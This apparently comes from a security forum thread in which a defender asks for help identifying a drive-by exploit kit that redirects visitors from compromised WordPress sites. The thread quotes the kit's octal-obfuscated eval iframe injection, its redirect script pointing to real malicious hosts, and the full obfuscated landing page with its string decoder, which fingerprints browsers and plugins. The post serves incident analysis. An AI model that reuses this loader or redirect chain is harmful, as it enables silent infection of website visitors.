We are seeing lots of people get redirected from various sites that appear to be wordpress based and they are being redirected to hosts located on 178.162.181.58.
The drive by kit on this seems to be slightly different from what I am used to seeing so I was wondering if someone could clue me in to what this is? It kind of looks like NeoSploit, but I am not sure if it is a different version or something. What makes me think that is the It is using the midi parse and java webstart vulnerabilities. It also serves these malicious jars up multiple times for some reason to the client.
Once hitting the site, the user is redirected with javascript thats starts off with:
eval('\\144\\157\\143\\165\\155\\145\\156\\164\\56\\167\\162\\151\\164\\145\\50\\47\\74\\151\\146\\162\\141\\155\\145\\40\\163\\162\\143\\75\\42\\150\\164\\164\\160\\72\\57\\57\
this translates to:
eval document.write ('<iframe src="http://
Following this redirect then causes the client to hit another redirect:
<script type="text/javascript">location.href = ("http://innovine.org/?2");</script>
The ?2 can also be other numbers (?3, etc). Following this then finally causes the user to hit the landing page. Things here are broken up slightly. The landing page refrences another script to deobfuscate and execute.
Landinge page:
<html><head><script type='text/javascript' src='http://innovine.org/?36babd0de612ba0a4055105a5050015c060e595050540b55010f5351555508570b'></script></head><body><input type='hidden' id='Y0IB5' value='MFRU3gs2zf5t4_098PCaQblu1cDpe7d6wZ'><div id='hoy'></div><div id='fay'></div><div id='nus'></div><script>mel='_DtQ2c22gaU4ZwZp7u';web=18;leg=jag(mel,web);fun='88QP18DDw8RMslz5';gab=15;hao=jag(fun,gab);git=window;yay=git[hao];rya=git[leg];function tit(v){var k,m,r;r='a1Fl9Q7wfZu6U1PQ6R';k=10;m=jag(r,k);return typeof v!=m}function lug(q,g){var n,a,u,y,o,d,v;v='5bReDlF44a3ddzl0013M_blb6_zR';u=21;d=jag(v,u);y='Dg8zswd3Ccc1_5gC7U';o=5;a=jag(y,o);n=yay[d](q);if(n){n[a]=g}}function peg(d,k,r){var y,v,s;v='bc24uMf7p4t57M';s=8;y=jag(v,s);return d[y](k,r)}function khi(m,w){return new RegExp(m,w)}function yip(b){var i,a,f,r,d,o,q,u,h,n,y,m,c,v,p,t,j,k;n='tlg4Z4pQ';r=20;t=jag(n,r);p='Qd3uC1RcCpMl00';k=9;v=jag(p,k);u='1w58ed88MglZsCDR0cMgQ5';m=7;h=jag(u,m);o='5zzRRDwd';d=19;y=jag(o,d);q='87QC1setdwRs';f=15;a=jag(q,f);try{c=khi(b,'i');i=rya[v];if(tit(i)){for(j=0;j<i[a];j++){if(c[y](i[j][t])||c[y](i[j][h])){return i[j]}}}}catch(e){}return null}function cel(n){var x,f,a,j,t,z,p,b;z='4bzR38M_eDDD';j=19;t=jag(z,j);b='3z2suwfacat8zseP6Z97Z3P8Zz';a=8;f=jag(b,a);if(tit(git[f])){for(x=0;x<n[t];x++){try{p=new ActiveXObject(n[x]);if(p)return p}catch(e){}}}return null}function dim(c){var d,l,i,x,u,m;d='1R813zes';u=5;i=jag(d,u);m='eRDz1F12lCQP';x=1;l=jag(m,x);return(typeof c==l&&(/\d/)[i](c))}function lac(a){var p,v,y,t,x,n,m,r,l,f,w,k,o;r='s_wfb38pzU6tuzCM';v=4;w=jag(r,v);o='FC2wPMcR';n=30;k=jag(o,n);t='RgQpcwlMsf167RDZ2QeF4UpUtDw5_P';x=8;m=jag(t,x);y='UubzFeabFRPwZQ';f=26;p=jag(y,f);l=dim(a)?khi(m)[k](a):null;return l?l[0][p](khi(w,'g'),','):null}function ava(j){var l,m,r,o,d,s,n,x,q,i,u,f,k,y,b,a,g,h,w,t;x='bw2pudfZpUtMpe';u=8;w=jag(x,u);d='fClD0e5cRFwzgzF70bzpR4dMlR';s=3;y=jag(d,s);a='t_g6Z6p3';q=20;b=jag(a,q);g='P6ul74Fagz_C';r=14;f=jag(g,r);h='9bPePUbw3Qcsp37u6fZdFM';t=16;m=jag(h,t);i=rya[w];o=(tit(i)?i[f]:0);k=(tit(git[y])?1:0);n=0;try{n=(rya[m]()?1:0)}catch(e){}l=[j,o,k,(n?1:0)];return l[b](';')}function opt(){var f,u,fg,p,g,k,o,w,r,y,v,x,b,a,n,s,t,j,q,m,fp,l,ff,d,z,i,h,c;p='M05plM';f=29;g=jag(p,f);w='sc1tzw1a';x=25;t=jag(w,x);r='ZQfD9su5f92Z94bp6eU8_1aF7PF1fd';l=30;q=jag(r,l);y='11z_dR8RM5leu0e90QMDQDsd1M';a=7;z=jag(y,a);i='RCCwd94U183e';s=27;h=jag(i,s);b='uzg8uMf0p8tC5e_1629FZs';d=8;k=jag(b,d);u='_09aPQbC';o=16;j=jag(u,o);n='fwgw6ezMa8_52ZUF6buCP0_s';v=20;c=jag(n,v);m='d0Dz1sls7fd6e78Z054z5bs2su3MR05dwfegecRU6F7ep4cRuw0uabP1zPsQ38f0MZg8d7FMZc6Rl0pwcdudbdae5a9Q_ltQfF28g5UzeQZz6u73pUcMulbda3Pl91_lt_fCMZg5URF5ZC6s7spRcFuwbda1Pl91_4tQRz24g1U4eU';fp=1;ff=jag(m,fp);ff=ava(ff);fg=yay[z](h);fg[c](j,q);fg[c](g,ff);yay[t][k](fg)}opt();</script></body></html>
Script being refrenced in the beginning:
function jag(u,h){var s,o,n,j,a,w,c,p,n,g,r,q;g=document.getElementById('Y0IB5').value;r='';q='';o=0;w='substr';j=u.length;for(c=0;c<j;c++){o+=h;n=u.charAt(c);a=g.indexOf(n);a+=o;a%=g.length;r+=g.charAt(a)}for(p=0;p<j;p+=2){n=r[w](p,2);s=parseInt(n,16);q+=String.fromCharCode(s)}return q}
Here I have just tossed it all together and made it easier to step through with FireBug:
<html><head><script type='text/javascript'>
function jag(u,h){var s,o,n,j,a,w,c,p,n,g,r,q;
g=document.getElementById('Y0IB5').value;
r='';
q='';
o=0;
w='substr';
j=u.length;
for(c=0;
c<j;
c++){o+=h;
n=u.charAt(c);
a=g.indexOf(n);
a+=o;
a%=g.length;
r+=g.charAt(a)}for(p=0;
p<j;
p+=2){n=r[w](p,2);
s=parseInt(n,16);
q+=String.fromCharCode(s)}return q}
</script></head>
<body>
<input type='hidden' id='Y0IB5' value='MFRU3gs2zf5t4_098PCaQblu1cDpe7d6wZ'>
<div id='hoy'></div>
<div id='fay'></div>
<div id='nus'></div>
<script>
mel='_DtQ2c22gaU4ZwZp7u';
web=18;
leg=jag(mel,web);
fun='88QP18DDw8RMslz5';
gab=15;
hao=jag(fun,gab);
git=window;
yay=git[hao];
rya=git[leg];
function tit(v){var k,m,r;
r='a1Fl9Q7wfZu6U1PQ6R';
k=10;
m=jag(r,k);
return typeof v!=m}function lug(q,g){var n,a,u,y,o,d,v;
v='5bReDlF44a3ddzl0013M_blb6_zR';
u=21;
d=jag(v,u);
y='Dg8zswd3Ccc1_5gC7U';
o=5;
a=jag(y,o);
n=yay[d](q);
if(n){n[a]=g}}function peg(d,k,r){var y,v,s;
v='bc24uMf7p4t57M';
s=8;
y=jag(v,s);
return d[y](k,r)}function khi(m,w){return new RegExp(m,w)}function yip(b){var i,a,f,r,d,o,q,u,h,n,y,m,c,v,p,t,j,k;
n='tlg4Z4pQ';
r=20;
t=jag(n,r);
p='Qd3uC1RcCpMl00';
k=9;
v=jag(p,k);
u='1w58ed88MglZsCDR0cMgQ5';
m=7;
h=jag(u,m);
o='5zzRRDwd';
d=19;
y=jag(o,d);
q='87QC1setdwRs';
f=15;
a=jag(q,f);
try{c=khi(b,'i');
i=rya[v];
if(tit(i)){for(j=0;
j<i[a];
j++){if(c[y](i[j][t])||c[y](i[j][h])){return i[j]}}}}catch(e){}return null}function cel(n){var x,f,a,j,t,z,p,b;
z='4bzR38M_eDDD';
j=19;
t=jag(z,j);
b='3z2suwfacat8zseP6Z97Z3P8Zz';
a=8;
f=jag(b,a);
if(tit(git[f])){for(x=0;
x<n[t];
x++){try{p=new ActiveXObject(n[x]);
if(p)return p}catch(e){}}}return null}function dim(c){var d,l,i,x,u,m;
d='1R813zes';
u=5;
i=jag(d,u);
m='eRDz1F12lCQP';
x=1;
l=jag(m,x);
return(typeof c==l&&(/\d/)[i](c))}function lac(a){var p,v,y,t,x,n,m,r,l,f,w,k,o;
r='s_wfb38pzU6tuzCM';
v=4;
w=jag(r,v);
o='FC2wPMcR';
n=30;
k=jag(o,n);
t='RgQpcwlMsf167RDZ2QeF4UpUtDw5_P';
x=8;
m=jag(t,x);
y='UubzFeabFRPwZQ';
f=26;
p=jag(y,f);
l=dim(a)?khi(m)[k](a):null;
return l?l[0][p](khi(w,'g'),','):null}function ava(j){var l,m,r,o,d,s,n,x,q,i,u,f,k,y,b,a,g,h,w,t;
x='bw2pudfZpUtMpe';
u=8;
w=jag(x,u);
d='fClD0e5cRFwzgzF70bzpR4dMlR';
s=3;
y=jag(d,s);
a='t_g6Z6p3';
q=20;
b=jag(a,q);
g='P6ul74Fagz_C';
r=14;
f=jag(g,r);
h='9bPePUbw3Qcsp37u6fZdFM';
t=16;
m=jag(h,t);
i=rya[w];
o=(tit(i)?i[f]:0);
k=(tit(git[y])?1:0);
n=0;
try{n=(rya[m]()?1:0)}catch(e){}l=[j,o,k,(n?1:0)];
return l[b](';')}function opt(){var f,u,fg,p,g,k,o,w,r,y,v,x,b,a,n,s,t,j,q,m,fp,l,ff,d,z,i,h,c;
p='M05plM';
f=29;
g=jag(p,f);
w='sc1tzw1a';
x=25;
t=jag(w,x);
r='ZQfD9su5f92Z94bp6eU8_1aF7PF1fd';
l=30;
q=jag(r,l);
y='11z_dR8RM5leu0e90QMDQDsd1M';
a=7;
z=jag(y,a);
i='RCCwd94U183e';
s=27;
h=jag(i,s);
b='uzg8uMf0p8tC5e_1629FZs';
d=8;
k=jag(b,d);
u='_09aPQbC';
o=16;
j=jag(u,o);
n='fwgw6ezMa8_52ZUF6buCP0_s';
v=20;
c=jag(n,v);
m='z3el853MFpDg0pD80uRclZ42wZlDz6w1dezDdaCe87FPus3zDdbFfd6aa2M376P3gRQ39RUDCg_RFC8MtwZ8bCf66Ca22e7fP3gep0zaUQcR_MeQust_Z80Cfd6zas2b78PggDp29wU1c4_9FCu4teZQbzfu6CaR2elDP3w1p59wU1c5';
fp=23;
ff=jag(m,fp);
ff=ava(ff);
fg=yay[z](h);
fg[c](j,q);
fg[c](g,ff);
yay[t][k](fg)}opt();
</script></body></html>
Looks like it enumerates browser and plugin information and then makes requests for specific exploits? I should have paid more attention in that RE class, I didn't think I'd ever have to be setting breakpoints in a DOM to understand what JavaScript was doing...
Topic: 178.162.181.58 - Help Identifying Drive By? (Read 5357 times)